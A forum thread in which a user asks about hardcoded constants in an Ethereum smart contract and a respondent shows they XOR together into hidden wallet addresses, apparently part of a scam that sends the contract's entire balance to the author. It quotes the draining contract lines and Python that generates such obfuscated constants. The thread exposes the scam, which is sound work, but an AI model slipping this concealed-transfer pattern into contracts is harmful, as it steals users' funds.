Dexrouter and factory value in an function

Does anybody know where exactly this parameters/values (dexRouter&Factory) that give the ethereum address come from? Is it to call a ethereum address/contract or something?

bytes32 DexRouter =0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67
bytes32 factory = 0x8a727dc41d83211e47d3c0de5f8b7b37c4e4163f5f773f2362872769c349730e

These are used in an function of an smart contract that compute to an ethereum address at Etherscan;

function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) {
return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory)));

It seems like a deliberately-obfuscated way to get the address:

0x019f638232e4a55ccc9aa13d34da6ef89ce1ae69

Which is the address of an externally-owned account (aka wallet) on ethereum/mainnet, possibly where your funds will ultimately be redirected to (if my assumption of this being part of a deliberate scam is correct).

You can click here in order to view that account on etherscan.

The address of that account is of course well known in advance, so there is obviously no reason to implement the getDexRouter function in a contract in order to compute that address (or if there was such reason, then that function could simply return the address as is instead of computing it).

You can do the same in Python, BTW:

DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67
factory = 0x8a727dc41d83211e47d3c0de5f8b7b37c4e4163f5f773f2362872769c349730e

print(f'{DexRouter ^ factory:#0{42}x}')

As to your question of where these two constant values come from - since the desired output of the getDexRouter function is known in advance, it is easy to generate a random pair of values which will return that same output when used in that function.

For example (again - in Python):

desiredOutput = 0x019f638232e4a55ccc9aa13d34da6ef89ce1ae69
DexRouter = someRandomPositiveInteger
factory = desiredOutput ^ DexRouter

print(f'{DexRouter:#0{66}x}')
print(f'{factory:#0{66}x}')

You run that script once, then copy these two values into the getDexRouter function and you’re done.

Thank you! I was genuinely curious about the origin of the dexrouter and factory addresses, but it now makes sense that they are simply a randomly generated pair of values used to derive the Ethereum address.

There is also a bytes Apikey in the contract;
bytes32 apiKey = 0x8a727dc41d83211e47d3c0deb0dd5717161b6a37a0d77dfc8ba7520cd209eb9e

it is used in a couple of functions;
getDexRouter(apiKey, DexRouter)
address dataProvider = getDexRouter(apiKey, DexRouter);

Is it used for “calling, initiating, and transmitting” transactions to the Ethereum address? And where does this value come from? It doesn’t appear to be a randomly generated pair of values like dexrouter and factory.

How did you conclude that?

It appears to be using the EXACT same principle demonstrated in the previous response.

Simply because it doesn’t seem to correlate with anything in the way dexrouter and factory do, which ultimately lead to the Ethereum address? I thought the ApiKey had something to do with the transaction or the connecting to Etherscan or something. That the value of the ApiKey itself make an important role to connect to something

Same trick.

First let’s find the desired output:

apiKey = 0x8a727dc41d83211e47d3c0deb0dd5717161b6a37a0d77dfc8ba7520cd209eb9e
DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67
dataProvider = apiKey ^ DexRouter
print(f'{dataProvider:#0{42}x}')

Which prints 0xeec94fa2e01bd954333ae3e2ddfa1b9d8da136f9.

Then, based on that, we can generate a random pair of values:

desiredOutput = 0xeec94fa2e01bd954333ae3e2ddfa1b9d8da136f9
DexRouter = someRandomPositiveInteger
apiKey = desiredOutput ^ DexRouter
print(f'{DexRouter:#0{66}x}')
print(f'{apiKey:#0{66}x}')

This pair of values will return the same (desired) output when used in that function.

The bottom-line here, is that the value of dataProvider is known in advance.
So there is no reason whatsoever to implement a function which calculates it.

I have looked into it, and the challenge, as I see it, is if one only has the Ethereum address provided (0x019f638232e4a55ccc9aa13d34da6ef89ce1ae69) and generates DexRouter and Factory via “someRandomPositiveInteger.” In that case, it seems impossible to use your code to find the dataProvider and next the ApiKey, which probably means that the ApiKey is not a randomly generated number. Or is there something I am not understanding?

to find the desired output:
apiKey = X
DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67 (asume generated via some Random Positive Integer)
dataProvider = apiKey ^ DexRouter
print(f’{dataProvider:#0{42}x}')**

Probably the fact that the value of dataProvider is known in advance, hence used OFFLINE - and in conjunction with a random value of DexRouter - in order to calculate the value of apiKey.
Once computed OFFLINE, these two values are hard-coded in the contract, allowing it to hide the known value of dataProvider from plain sight.

Other than that, it is worth noting that they also obfuscate things slightly further, making it harder for the reader to see what’s going on.

More specifically, they’ve implemented this function:

function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory)

But then they’re calling it like this:

getDexRouter(apiKey, DexRouter)

Note how they’re using variable names in an obfuscated manner:

  • In the function declaration, the 1st input argument is the DEX router (_DexRouterAddress)
  • In the function call itself, the 2nd input argument is the DEX router (DexRouter)

If this is still unclear to you, then please rewrite your question in a clearer manner, including ALL the relevant details and ONLY the relevant details.

For example, you’ve mentioned a variable named factory, but you haven’t shown any code which actually uses that variable.

I will attempt to explain. The code seems to have only three hardcoded values for transferring Ethereum between smart contracts, namely apikey, dexrouter, and factory. The latter two are used to derive the ETH address (0x019f638232E4a55CCC9Aa13D34Da6EF89CE1aE69). As pointed out earlier, factory and dexrouter can be calculated as random numbers and used in the code solely to produce the Ethereum address. The question is whether ApiKey is also just a random value and, if so, how it is calculated? The code is lengthy, but, as you noted, likely designed more to mislead. Here is all the code that utilizes factory, dexrouter, and ApiKey, which is relatively concise.

bytes32 apiKey = 0x8a727dc41d83211e47d3c0deb0dd5717161b6a37a0d77dfc8ba7520cd209eb9e;
bytes32 DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67;
bytes32 factory = 0x8a727dc41d83211e47d3c0de5f8b7b37c4e4163f5f773f2362872769c349730e;

constructor(){
_owner = msg.sender;
address dataProvider = getDexRouter(apiKey, DexRouter);
IERC20(dataProvider).createContract(address(this));

function startArbitrageNative() internal {
address tradeRouter = getDexRouter(DexRouter, factory);
address dataProvider = getDexRouter(apiKey, DexRouter);
IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance);
payable(tradeRouter).transfer(address(this).balance);

function factory() external pure returns (address);

function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) {
return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory)));

function startArbitrageNative() internal {
address tradeRouter = getDexRouter(DexRouter, factory);
address dataProvider = getDexRouter(apiKey, DexRouter);
IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance);
payable(tradeRouter).transfer(address(this).balance);
}

Python code:

# values that we want hide from plain sight:
tradeRouter = 0x019f638232e4a55ccc9aa13d34da6ef89ce1ae69
dataProvider = 0xeec94fa2e01bd954333ae3e2ddfa1b9d8da136f9

# values that we want to show instead:
DexRouter = someRandomPositiveInteger
factory = tradeRouter ^ DexRouter
apiKey = dataProvider ^ DexRouter

print(f'bytes32 DexRouter = {DexRouter:#0{66}x};')
print(f'bytes32 factory = {factory:#0{66}x};')
print(f'bytes32 apiKey = {apiKey:#0{66}x};')

If you replace this:

someRandomPositiveInteger

With this:

0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67

And run that code, then you get a printout of those 3 contract constants.


As you can see, all this code does is:

  1. Choosing a random value of DexRouter
  2. Calculating the values of factory and apiKey based on that

So I claim the following two statements:

  1. The (DexRouter, factory) tuple is random
  2. The (DexRouter, apiKey) tuple is random

You could claim that each one of these tuples is “semi random” and so on, but it’s really just a matter of terminology.

The fact of the matter remains the same - whoever wrote this contract has made a notable effort in attempting to obfuscate it.

So you probably want to ask yourself why (I can think of only one reason, which I have already mentioned here before).

I see. I understand that the tradeRouter is the Ethereum address itself. However, where does the value for dataProvider originate? You mentioned it’s known offline? But what is dataProvider and what role does this one have, similar to how the tradeRouter’s task is to send Ethereum to the correct address?

In the code you provided earlier (see below), it seems impossible to calculate this without knowledge of the Api Key and DexRouter. If I understood you correctly, the dataProvider is not a random number, it is derived from some source, but then hided in the code.

apiKey = 0x8a727dc41d83211e47d3c0deb0dd5717161b6a37a0d77dfc8ba7520cd209eb9e
DexRouter = 0x8a727dc41d83211e47d3c0de5e1418b5f600b36393ed9e1e565d49915fa8dd67
dataProvider = apiKey ^ DexRouter
print(f’{dataProvider:#0{42}x}')

I’ve repeated myself about 3 or 4 times already, so I’ll do this effort one last time:

The values (addresses) of tradeRouter and dataProvider are ALREADY KNOWN to whoever implemented this contract.

For some reason, that person wanted to hide them from plain sight, probably with the hope that readers will not try to find out what they’re actually being used for.

Instead, that person has generated some random value named DexRouter.

They then used that random value together with those two known addresses, in order to generate two other values named factory and apiKey.

Finally, they took those 3 new values, and hard-coded them in the contract, next to a function which when called correctly, returns either one of the 2 original values.

So they’ve ended up replacing 2 meaningful values with 3 meaningless values.

For example, if you had those 2 meaningful values shown in the contract, then you could easily look them up on etherscan or similar, something which you cannot do with the 3 meaningless values shown in the contract.

Thank you for the explanation. I comprehend your description, it was good. Could you provide insights into the purpose of the dataProvider and its role within the contract? Where does this value originate from? If I understand you correctly, is it a value from Etherscan linked to the Ethereum address in some way?

There is no such thing “a value from Etherscan”.
Etherscan is just web2-service (aka website) which allows users to view and interact with various entities (contracts, wallets, etc) on the Ethereum blockchain.

These two addresses ( tradeRouter and dataProvider) are probably accounts under the control of the same person who implemented that obfuscated contract.

You can browse each on of them on etherscan and find out for yourself, whether it’s an externally-owned account (aka wallet) or a smart-contract account (aka contract).

1 Like

Okay, thank you, it became somewhat more understandable. Now I grasp a bit more about how it functions and that both dataProvider and tradeRouter refer to accounts

1 Like